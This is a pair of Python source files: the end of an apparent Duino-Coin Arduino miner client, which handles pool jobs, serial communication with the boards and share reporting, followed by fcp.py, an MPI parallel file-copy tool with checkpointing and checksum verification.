+ ")",
'success')
else:
pretty_print(
'sys0',
' Miner is outdated (v'
+ MINER_VER
+ ') -'
+ get_string('server_is_on_version')
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ get_string('update_warning'),
'warning')
sleep(10)
soc.send(bytes("MOTD", encoding="ascii"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Connection error: ' + str(e))
sleep(10)
pretty_print(
'sys'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_start')
+ Style.NORMAL
+ Fore.RESET
+ get_string('mining_algorithm')
+ str(com)
+ ')',
'success')
while True:
# Send job request
debug_output(com + ': requested job from the server')
soc.sendall(
bytes(
'JOB,'
+ str(username)
+ ',AVR',
encoding='ascii'))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(''.join(filter(str.isdigit, com)))
+ "Correct job received")
except:
pretty_print("usb"
+ str(''.join(filter(str.isdigit, com))),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
while True:
try:
ser.close()
except:
pass
try:
ser = Serial(com,
baudrate=int(BAUDRATE),
timeout=float(AVR_TIMEOUT))
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ ' (port connection err: '
+ str(e)
+ ')',
'error')
sleep(10)
while True:
retry_counter = 0
while True:
if retry_counter >= 3:
break
try:
debug_output(com + ': sending job to AVR')
ser.write(
bytes(
str(
job[0]
+ ',' + job[1]
+ ',' + job[2]
+ ','), encoding='ascii'))
debug_output(com + ': reading result from AVR')
result = ser.read_until(b'\n').decode().strip()
ser.flush()
if "\x00" in result or not result:
raise Exception("Empty data received")
debug_output(com + ': retrieved result: '
+ str(result)
+ ' len: '
+ str(len(result)))
result = result.split(',')
try:
if result[0] and result[1]:
break
except Exception as e:
debug_output(
com
+ ': retrying reading data: '
+ str(e))
retry_counter += 1
except Exception as e:
debug_output(
com
+ ': retrying sending data: '
+ str(e))
retry_counter += 1
try:
debug_output(
com
+ ': received result ('
+ str(result[0])
+ ')')
debug_output(
com
+ ': received time ('
+ str(result[1])
+ ')')
# Convert AVR time to seconds
computetime = round(int(result[1]) / 1000000, 3)
if computetime < 1:
computetime = str(
int(computetime * 1000)) + "ms"
else:
computetime = str(round(computetime, 2)) + "s"
# Calculate hashrate
hashrate_t = round(
int(result[0]) * 1000000 / int(result[1]), 2)
hashrate_mean.append(hashrate_t)
# Get average from the last hashrate measurements
hashrate = mean(hashrate_mean[-5:])
debug_output(
com +
': calculated hashrate (' +
str(hashrate_t) + ')'
+ ' (avg:' + str(hashrate) + ')')
try:
chipID = result[2]
debug_output(
com + ': chip ID: ' + str(result[2]))
""" Check if chipID got received, this is
of course just a fraction of what's
happening on the server with it """
if not chipID.startswith('DUCOID'):
raise Exception('Wrong chipID string')
except Exception:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
' Possible incorrect chip ID!'
+ Style.NORMAL
+ Fore.RESET
+ ' This can cause problems with the'
+ ' Kolka system',
'warning')
chipID = 'None'
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_avr_connection_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (error reading result from the board: '
+ str(e)
+ ', please check connection '
+ 'and port setting)',
'warning')
debug_output(
com + ': error splitting data: ' + str(e))
sleep(1)
try:
# Send result to the server
soc.sendall(
bytes(
str(result[0])
+ ','
+ str(hashrate_t)
+ ',Official AVR Miner v'
+ str(MINER_VER)
+ ','
+ str(rig_identifier)
+ ','
+ str(chipID),
encoding='ascii'))
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output(com + ': connection error: ' + str(e))
sleep(5)
break
while True:
try:
responsetimestart = now()
feedback = soc.recv(64).decode().rstrip('\n')
responsetimestop = now()
time_delta = (responsetimestop -
responsetimestart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
debug_output(com + ': feedback: '
+ str(feedback)
+ ' with ping: '
+ str(ping))
break
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (err parsing response: '
+ str(e)
+ ')',
'error')
debug_output(com + ': error parsing response: '
+ str(e))
sleep(5)
break
diff = get_prefix(diff)
if feedback == 'GOOD':
# If result was correct
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.GREEN
+ ' ⛏'
+ get_string('accepted')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
elif feedback == 'BLOCK':
# If block was found
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.CYAN
+ ' ⛏'
+ get_string('block_found')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
else:
# If result was incorrect
shares[1] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.RED
+ ' ✗'
+ get_string('rejected')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
hashrate,
uptime)
start_time = time()
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' (main loop err: '
+ str(e)
+ ')',
'error')
debug_output('Main loop error: ' + str(e))
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" "
+ get_string('periodic_mining_report')
+ Fore.RESET
+ Style.NORMAL
+ get_string('report_period')
+ str(seconds)
+ get_string('report_time')
+ get_string('report_body1')
+ str(shares)
+ get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s"
+ get_string('report_body5')
+ str(int(hashrate*seconds))
+ get_string('report_body6')
+ get_string('total_mining_time')
+ str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime >= 7200:
return str(round(uptime // 3600)) + get_string('uptime_hours')
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string('uptime_hour')
elif uptime >= 120:
return str(round(uptime // 60)) + get_string('uptime_minutes')
elif uptime >= 60:
return str(round(uptime // 60)) + get_string('uptime_minute')
else:
return str(round(uptime)) + get_string('uptime_seconds')
def fetch_pools():
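# Ask the Duino-Coin server for the current mining node (ip/port); retry every 15 s on failure.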
while True:
pretty_print("net0",
" "
+ get_string("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == '__main__':
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True, convert=True)
else:
init(autoreset=True)
# Window title
title(get_string('duco_avr_miner') + str(MINER_VER) + ')')
try:
# Load config file or create new one
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0',
get_string('load_config_error')
+ RESOURCES_DIR
+ get_string('load_config_error_warning')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Error reading configfile: ' + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
greeting()
debug_output('greeting displayed')
except Exception as e:
debug_output('Error displaying greeting message: ' + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except Exception as e:
print(e)
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
# Launch avr duco mining threads
threadid = 0
for port in avrport:
thrThread(
target=mine_avr,
args=(port, threadid)).start()
threadid += 1
except Exception as e:
debug_output('Error launching AVR thread(s): ' + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output('Error launching Discord RPC thread: ' + str(e))
|
fcp.py
|
#!/usr/bin/env python
"""
PCP provides MPI-based parallel data transfer functionality.
Author: Feiyi Wang (fwang2@ornl.gov)
"""
from __future__ import print_function, division
import time
import stat
import os
import shutil
import os.path
import hashlib
import sys
import signal
import resource
import sqlite3
import math
import cPickle as pickle
from collections import Counter
from threading import Thread
from mpi4py import MPI
import utils
from utils import bytes_fmt, destpath
from task import BaseTask
from verify import PVerify
from circle import Circle
from cio import readn, writen
from fwalk import FWalk
from checkpoint import Checkpoint
from fdef import FileChunk, ChunkSum
from globals import G
from globals import Tally as T
from dbstore import DbStore
from dbsum import MemSum
from fsum import export_checksum2
from fdef import FileItem
from _version import get_versions
from mpihelper import ThrowingArgumentParser, parse_and_bcast
from bfsignature import BFsignature
from pcircle.lru import LRU
__version__ = get_versions()['version']
del get_versions
args = None
circle = None
treewalk = None
oflimit = 0
fcp = None
num_of_hosts = 0
taskloads = []
comm = MPI.COMM_WORLD
dmsg = {"rank": "rank %s" % comm.rank}
log = utils.getLogger(__name__)
def err_and_exit(msg, code=0):
if comm.rank == 0:
print("\n%s\n" % msg)
MPI.Finalize()
sys.exit(0)
def gen_parser():
parser = ThrowingArgumentParser(description="Parallel Data Copy",
epilog="Please report issues to fwang2@ornl.gov")
parser.add_argument("--version", action="version", version="{version}".format(version=__version__))
parser.add_argument("-v", "--verbosity", action="count", help="increase verbosity")
parser.add_argument("--loglevel", default="error", help="log level, default ERROR")
parser.add_argument("--chunksize", metavar="sz", default="1m", help="chunk size (KB, MB, GB, TB), default: 1MB")
parser.add_argument("--adaptive", action="store_true", default=True, help="Adaptive chunk size")
parser.add_argument("--reduce-interval", metavar="s", type=int, default=10, help="interval, default 10s")
parser.add_argument("--no-fixopt", action="store_true", help="skip fixing ownership, permssion, timestamp")
parser.add_argument("--verify", action="store_true", help="verify after copy, default: off")
parser.add_argument("-s", "--signature", action="store_true", help="aggregate checksum for signature, default: off")
parser.add_argument("-p", "--preserve", action="store_true", help="Preserving meta, default: off")
# using a bloom filter for signature generation; full chunksum info is no longer available at the root process
parser.add_argument("-o", "--output", metavar='', default="sha1-%s.sig" % utils.timestamp2(), help="sha1 output file")
parser.add_argument("-f", "--force", action="store_true", help="force overwrite")
parser.add_argument("-t", "--cptime", metavar="s", type=int, default=3600, help="checkpoint interval, default: 1hr")
parser.add_argument("-i", "--cpid", metavar="ID", default=None, help="checkpoint file id, default: timestamp")
parser.add_argument("-r", "--rid", dest="rid", metavar="ID", help="resume ID, required in resume mode")
parser.add_argument("--pause", metavar="s", type=int, help="pause a delay (seconds) after copy, test only")
parser.add_argument("--item", type=int, default=100000, help="number of items stored in memory, default: 100000")
parser.add_argument("src", nargs='+', help="copy from")
parser.add_argument("dest", help="copy to")
return parser
def sig_handler(signal, frame):
# catch keyboard, do nothing
# eprint("\tUser cancelled ... cleaning up")
sys.exit(1)
class FCP(BaseTask):
def __init__(self, circle, src, dest,
treewalk=None,
totalsize=0,
hostcnt=0,
prune=False,
verify=False,
resume=False,
workq=None):
BaseTask.__init__(self, circle)
self.circle = circle
self.treewalk = treewalk
self.totalsize = totalsize
self.prune = prune
self.workq = workq
self.resume = resume
self.checkpoint_file = None
self.checkpoint_db = None
self.src = src
self.dest = os.path.abspath(dest)
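# Bounded LRU caches of open file descriptors (source reads, destination writes);
# descriptors evicted from either cache are closed via cb_close_fd.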
self.rfd_cache = LRU(oflimit, callback = self.cb_close_fd)
self.wfd_cache = LRU(oflimit, callback = self.cb_close_fd)
self.cnt_filesize_prior = 0
self.cnt_filesize = 0
self.blocksize = 1024 * 1024
self.chunksize = 1024 * 1024
# debug
self.d = {"rank": "rank %s" % circle.rank}
self.wtime_started = MPI.Wtime()
self.wtime_ended = None
self.workcnt = 0 # this is the cnt for the enqued items
self.reduce_items = 0 # this is the cnt for processed items
if self.treewalk:
log.debug("treewalk files = %s" % treewalk.flist, extra=self.d)
# fini_check
self.fini_cnt = Counter()
# verify
self.verify = verify
self.use_store = False
if self.verify:
self.chunksums_mem = []
self.chunksums_buf = []
# checkpointing
self.checkpoint_interval = sys.maxsize
self.checkpoint_last = MPI.Wtime()
if self.circle.rank == 0:
print("Start copying process ...")
def cb_close_fd(self, k, v):
try:
os.close(v)
except:
pass
def set_fixed_chunksize(self, sz):
self.chunksize = sz
def set_adaptive_chunksize(self, totalsz):
self.chunksize = utils.calc_chunksize(totalsz)
if self.circle.rank == 0:
print("Adaptive chunksize: %s" % bytes_fmt(self.chunksize))
def cleanup(self):
self.rfd_cache.clear()
self.wfd_cache.clear()
# remove checkpoint file
if self.checkpoint_file and os.path.exists(self.checkpoint_file):
os.remove(self.checkpoint_file)
if self.checkpoint_db and os.path.exists(self.checkpoint_db):
os.remove(self.checkpoint_db)
# remove provided checkpoint file
if G.resume and G.chk_file and os.path.exists(G.chk_file):
os.remove(G.chk_file)
if G.resume and G.chk_file_db and os.path.exists(G.chk_file_db):
os.remove(G.chk_file_db)
# remove chunksums file
if self.verify:
if hasattr(self, "chunksums_db"):
self.chunksums_db.cleanup()
# we need to do this because if last job didn't finish cleanly
# the fwalk files can be found as leftovers
# and if fcp cleanup has a chance, it should clean up that
"""
fwalk = "%s/fwalk.%s" % (G.tempdir, self.circle.rank)
if os.path.exists(fwalk):
os.remove(fwalk)
"""
def new_fchunk(self, fitem):
fchunk = FileChunk() # default cmd = copy
fchunk.src = fitem.path
fchunk.dest = destpath(fitem, self.dest)
return fchunk
def enq_file(self, fi):
""" Process a single file, represented by "fi" - FileItem
It involves chunking this file and enqueuing all chunks. """
chunks = fi.st_size // self.chunksize
remaining = fi.st_size % self.chunksize
workcnt = 0
if fi.st_size == 0: # empty file
fchunk = self.new_fchunk(fi)
fchunk.offset = 0
fchunk.length = 0
self.enq(fchunk)
workcnt += 1
else:
for i in range(chunks):
fchunk = self.new_fchunk(fi)
fchunk.offset = i * self.chunksize
fchunk.length = self.chunksize
self.enq(fchunk)
workcnt += chunks
if remaining > 0:
# send remainder
fchunk = self.new_fchunk(fi)
fchunk.offset = chunks * self.chunksize
fchunk.length = remaining
self.enq(fchunk)
workcnt += 1
# save work cnt
self.workcnt += workcnt
log.debug("enq_file(): %s, size = %s, workcnt = %s" % (fi.path, fi.st_size, workcnt),
extra=self.d)
def handle_fitem(self, fi):
if os.path.islink(fi.path):
dest = destpath(fi, self.dest)
linkto = os.readlink(fi.path)
try:
os.symlink(linkto, dest)
except Exception as e:
log.debug("%s, skipping sym link %s" % (e, fi.path), extra=self.d)
elif stat.S_ISREG(fi.st_mode):
self.enq_file(fi) # where chunking takes place
def create(self):
""" Each task has one create(), which is invoked by circle ONCE.
For FCP, each task will handle_fitem() -> enq_file()
to process each file gathered during the treewalk stage. """
if not G.use_store and self.workq: # restart
self.setq(self.workq)
return
if self.resume:
return
# construct and enable all copy operations
# the batching of operations is hard-coded
log.info("create() starts, flist length = %s" % len(self.treewalk.flist),
extra=self.d)
# flist in memory
if len(self.treewalk.flist) > 0:
for fi in self.treewalk.flist:
self.handle_fitem(fi)
# flist in buf
if len(self.treewalk.flist_buf) > 0:
for fi in self.treewalk.flist_buf:
self.handle_fitem(fi)
# flist in database
if self.treewalk.use_store:
while self.treewalk.flist_db.qsize > 0:
fitems, _ = self.treewalk.flist_db.mget(G.DB_BUFSIZE)
for fi in fitems:
self.handle_fitem(fi)
self.treewalk.flist_db.mdel(G.DB_BUFSIZE)
# both memory and database checkpoint
if self.checkpoint_file:
self.do_no_interrupt_checkpoint()
self.checkpoint_last = MPI.Wtime()
# gather total_chunks
self.circle.comm.barrier()
G.total_chunks = self.circle.comm.allreduce(self.workcnt, op=MPI.SUM)
#G.total_chunks = self.circle.comm.bcast(G.total_chunks)
#print("Total chunks: ",G.total_chunks)
def do_open2(self, k, d, flag):
""" d is fd cache (either read or write)
open path 'k' with 'flags' """
if d.has_key(k):
return d.get(k)
fd = -1
try:
fd = os.open(k, flag)
except OSError as e:
if e.errno == 28: # no space left
log.error("Critical error: %s, exit!" % e, extra=self.d)
self.circle.exit(0) # should abort
else:
log.error("OSError({0}):{1}, skipping {2}".format(e.errno, e.strerror, k), extra=self.d)
else:
if fd > 0:
d.set(k, fd)
finally:
return fd
@staticmethod
def do_mkdir(work):
dest = work.dest
if not os.path.exists(dest):
os.makedirs(dest)
def do_copy(self, work):
src = work.src
dest = work.dest
basedir = os.path.dirname(dest)
if not os.path.exists(basedir):
os.makedirs(basedir)
rfd = self.do_open2(src, self.rfd_cache, os.O_RDONLY)
if rfd < 0:
return False
wfd = self.do_open2(dest, self.wfd_cache, os.O_WRONLY | os.O_CREAT)
if wfd < 0:
if args.force:
try:
os.unlink(dest)
except OSError as e:
log.error("Failed to unlink %s, %s " % (dest, e), extra=self.d)
return False
else:
wfd = self.do_open2(dest, self.wfd_cache, os.O_WRONLY | os.O_CREAT)  # recreate after the forced unlink
else:
log.error("Failed to create output file %s" % dest, extra=self.d)
return False
# do the actual copy
self.write_bytes(rfd, wfd, work)
# update tally
self.cnt_filesize += work.length
if G.verbosity > 2:
log.debug("Transferred %s bytes from:\n\t [%s] to [%s]" %
(self.cnt_filesize, src, dest), extra=self.d)
return True
def do_no_interrupt_checkpoint(self):
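# Run the checkpoint in a short-lived thread and join it immediately: signals such as SIGINT
# are only delivered to the main thread, so the pickle/rename below cannot be interrupted halfway.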
a = Thread(target=self.do_checkpoint)
a.start()
a.join()
if G.verbosity > 0:
print("Checkpoint: %s" % self.checkpoint_file)
def do_checkpoint(self):
tmp_file = self.checkpoint_file + ".part"
with open(tmp_file, "wb") as f:
self.circle.workq.extend(self.circle.workq_buf)
self.circle.workq_buf.clear()
cobj = Checkpoint(self.src, self.dest, self.get_workq(), self.totalsize)
pickle.dump(cobj, f, pickle.HIGHEST_PROTOCOL)
# POSIX requires rename to be atomic
os.rename(tmp_file, self.checkpoint_file)
# copy workq_db database file
if hasattr(self.circle, "workq_db") and len(self.circle.workq_db) > 0:
self.checkpoint_db = self.checkpoint_file + ".db"
if not G.resume:
shutil.copy2(self.circle.dbname, self.checkpoint_db)
else:
# in resume mode, make a copy of current workq db file, which is provided checkpoint db file
self.workdir = os.getcwd()
existingCheckpoint = os.path.join(self.workdir,".pcp_workq.%s.%s.db" % (G.rid, self.circle.rank))
shutil.copy2(existingCheckpoint,self.checkpoint_db)
def process(self):
"""
The only work is "copy"
TODO: clean up other actions such as mkdir/fini_check
"""
if not G.use_store:
curtime = MPI.Wtime()
if curtime - self.checkpoint_last > self.checkpoint_interval:
self.do_no_interrupt_checkpoint()
log.info("Checkpointing done ...", extra=self.d)
self.checkpoint_last = curtime
work = self.deq()
self.reduce_items += 1
if isinstance(work, FileChunk):
self.do_copy(work)
else:
log.warn("Unknown work object: %s" % work, extra=self.d)
err_and_exit("Not a correct workq format")
def reduce_init(self, buf):
buf['cnt_filesize'] = self.cnt_filesize
if sys.platform == 'darwin':
buf['mem_snapshot'] = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
else:
buf['mem_snapshot'] = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * 1024
def reduce(self, buf1, buf2):
buf1['cnt_filesize'] += buf2['cnt_filesize']
buf1['mem_snapshot'] += buf2['mem_snapshot']
return buf1
def reduce_report(self, buf):
out = ""
if self.totalsize != 0:
out += "%.2f %% finished, " % (100 * float(buf['cnt_filesize']) // self.totalsize)
out += "%s copied" % bytes_fmt(buf['cnt_filesize'])
if self.circle.reduce_time_interval != 0:
rate = float(buf['cnt_filesize'] - self.cnt_filesize_prior) / self.circle.reduce_time_interval
self.cnt_filesize_prior = buf['cnt_filesize']
out += ", estimated transfer rate: %s/s" % bytes_fmt(rate)
out += ", memory usage: %s" % bytes_fmt(buf['mem_snapshot'])
print(out)
def reduce_finish(self, buf):
# self.reduce_report(buf)
pass
def epilogue(self):
global taskloads
self.wtime_ended = MPI.Wtime()
taskloads = self.circle.comm.gather(self.reduce_items)
if self.circle.rank == 0:
if self.totalsize == 0:
print("\nZero filesize detected, done.\n")
return
tlapse = self.wtime_ended - self.wtime_started
rate = float(self.totalsize) / tlapse
print("\nFCP Epilogue:\n")
print("\t{:<20}{:<20}".format("Ending at:", utils.current_time()))
print("\t{:<20}{:<20}".format("Completed in:", utils.conv_time(tlapse)))
print("\t{:<20}{:<20}".format("Transfer Rate:", "%s/s" % bytes_fmt(rate)))
print("\t{:<20}{:<20}".format("Use store chunksums:", "%s" % self.use_store))
print("\t{:<20}{:<20}".format("Use store workq:", "%s" % self.circle.use_store))
print("\t{:<20}{:<20}".format("FCP Loads:", "%s" % taskloads))
def read_then_write(self, rfd, wfd, work, num_of_bytes, m):
""" core entry point for copy action: first read then write.
@param num_of_bytes: the exact amount of bytes we will copy
@return: False if unsuccessful.
"""
buf = None
try:
buf = readn(rfd, num_of_bytes)
except IOError:
self.logger.error("Failed to read %s", work.src, extra=self.d)
return False
try:
writen(wfd, buf)
except IOError:
self.logger.error("Failed to write %s", work.dest, extra=self.d)
return False
if m:
m.update(buf)
return True
def write_bytes(self, rfd, wfd, work):
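# Copy a single chunk: seek both descriptors to the chunk offset, stream it in blocksize
# pieces, and (when verification is on) hash the chunk with SHA1 and record its ChunkSum.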
os.lseek(rfd, work.offset, os.SEEK_SET)
os.lseek(wfd, work.offset, os.SEEK_SET)
m = None
if self.verify:
m = hashlib.sha1()
remaining = work.length
while remaining != 0:
if remaining >= self.blocksize:
self.read_then_write(rfd, wfd, work, self.blocksize, m)
remaining -= self.blocksize
else:
self.read_then_write(rfd, wfd, work, remaining, m)
remaining = 0
if self.verify:
# use src path here
ck = ChunkSum(work.dest, offset=work.offset, length=work.length,
digest=m.hexdigest())
if len(self.chunksums_mem) < G.memitem_threshold:
self.chunksums_mem.append(ck)
else:
self.chunksums_buf.append(ck)
if len(self.chunksums_buf) == G.DB_BUFSIZE:
if self.use_store == False:
self.workdir = os.getcwd()
self.chunksums_dbname = "%s/chunksums.%s" % (G.tempdir, self.circle.rank)
self.chunksums_db = DbStore(dbname=self.chunksums_dbname)
self.use_store = True
self.chunksums_db.mput(self.chunksums_buf)
del self.chunksums_buf[:]
def check_dbstore_resume_condition(rid):
global circle
local_checkpoint_cnt = 0
local_dbfile_cnt = 0
db_file = "workq.%s-%s" % (rid, circle.rank)
db_full = os.path.join(".pcircle", db_file)
chk_file = "workq.%s-%s.CHECK_OK" % (rid, circle.rank)
chk_full = os.path.join(".pcircle", chk_file)
if not os.path.exists(db_full):
err_and_exit("Resume condition not met, can't locate %s" % db_file, 0)
else:
local_dbfile_cnt = 1
if not os.path.exists(chk_full):
err_and_exit("Resume condition not met, can't locate %s" % chk_file, 0)
else:
local_checkpoint_cnt = 1
total_checkpoint_cnt = circle.comm.allreduce(local_checkpoint_cnt)
total_dbfile_cnt = circle.comm.allreduce(local_dbfile_cnt)
if total_dbfile_cnt != 0 and total_checkpoint_cnt == total_dbfile_cnt:
if circle.rank == 0:
print("Resume condition ... OK\n")
else:
err_and_exit("Resume conditon not be met: mismatch db and check file", 0)
return chk_full, db_full
def check_source_and_target(isrc, idest):
""" verify and return target destination, isrc is iterable, idest is not.
"""
checked_src = []
checked_dup = set()
is_dest_exist, is_dest_dir, is_dest_file, is_dest_parent_ok = False, False, False, False
idest = os.path.abspath(idest)
if os.path.exists(idest):
if not os.access(idest, os.W_OK):
err_and_exit("Destination is not accessible", 0)
is_dest_exist = True
if os.path.isfile(idest):
is_dest_file = True
elif os.path.isdir(idest):
is_dest_dir = True
else:
# idest doesn't exist at this point
# we check if its parent exists
dest_parent = os.path.dirname(idest)
if not (os.path.exists(dest_parent) and os.access(dest_parent, os.W_OK)):
err_and_exit("Error: destination [%s] is not accessible" % dest_parent, 0)
is_dest_parent_ok = True
for ele in isrc:
elepath = os.path.abspath(ele)
elefi = FileItem(elepath)
elefi.dirname = os.path.dirname(elepath) # save dirname for proper dest construction
elebase = os.path.basename(elepath)
if elebase in checked_dup:
err_and_exit("Error: source name conflict detected: [%s]" % elepath)
checked_dup.add(elebase)
if os.path.exists(elepath) and os.access(elepath, os.R_OK):
checked_src.append(elefi)
else:
err_and_exit("Error: source [%s] doesn't exist or not accessible." % ele, 0)
if len(checked_src) == 0:
err_and_exit("Error, no valid input", 0)
elif len(checked_src) == 1 and os.path.isfile(checked_src[0].path):
if is_dest_exist:
if is_dest_file and args.force:
try:
os.remove(idest)
except OSError as e:
err_and_exit("Error: can't overwrite %s" % idest, 0)
else:
G.copytype = 'file2file'
elif is_dest_dir:
G.copytype = "file2dir"
elif is_dest_parent_ok:
G.copytype = 'file2file'
else:
err_and_exit("Error: can't detect correct copy type!", 0)
elif len(checked_src) == 1 and not is_dest_exist:
G.copytype = "dir2dir"
elif len(checked_src) == 1 and is_dest_dir:
if not args.force:
err_and_exit("Error: destination [%s] exists, will not overwrite!" % idest)
else:
G.copytype = "dir2dir"
else:
# multiple sources, destination must be directory
if not os.path.exists(idest):
err_and_exit("Error: target directory %s doesn't exist!" % idest)
if os.path.exists(idest) and os.path.isfile(idest):
err_and_exit("Error: destination [%s] is a file, directory required" % idest, 0)
# if is_dest_exist and not (args.force or args.rid):
# err_and_exit("Destination [%s] exists, will not overwrite!" % idest, 0)
G.copytype = "file2dir"
return checked_src, idest
def set_chunksize(pcp, tsz):
if args.adaptive:
pcp.set_adaptive_chunksize(tsz)
else:
pcp.set_fixed_chunksize(utils.conv_unit(args.chunksize))
def prep_recovery():
""" Prepare for checkpoint recovery, return recovered workq """
global args, circle
oldsz, tsz, sz = 0, 0, 0
sz_db = 0
cobj = None
local_checkpoint_cnt = 0
chk_file = ".pcp_workq.%s.%s" % (args.rid, circle.rank)
chk_file_db = ".pcp_workq.%s.%s.db" % (args.rid, circle.rank)
G.chk_file = chk_file
G.chk_file_db = chk_file_db
if os.path.exists(chk_file):
local_checkpoint_cnt = 1
with open(chk_file, "rb") as f:
try:
cobj = pickle.load(f)
sz = get_workq_size(cobj.workq)
src = cobj.src
dest = cobj.dest
oldsz = cobj.totalsize
except Exception as e:
log.error("error reading %s" % chk_file, extra=dmsg)
circle.comm.Abort()
if os.path.exists(chk_file_db):
qsize_db = 0
local_checkpoint_cnt = 1
conn = sqlite3.connect(chk_file_db)
cur = conn.cursor()
try:
cur.execute("SELECT * FROM checkpoint")
qsize_db, sz_db = cur.fetchone()
except sqlite3.OperationalError as e:
pass
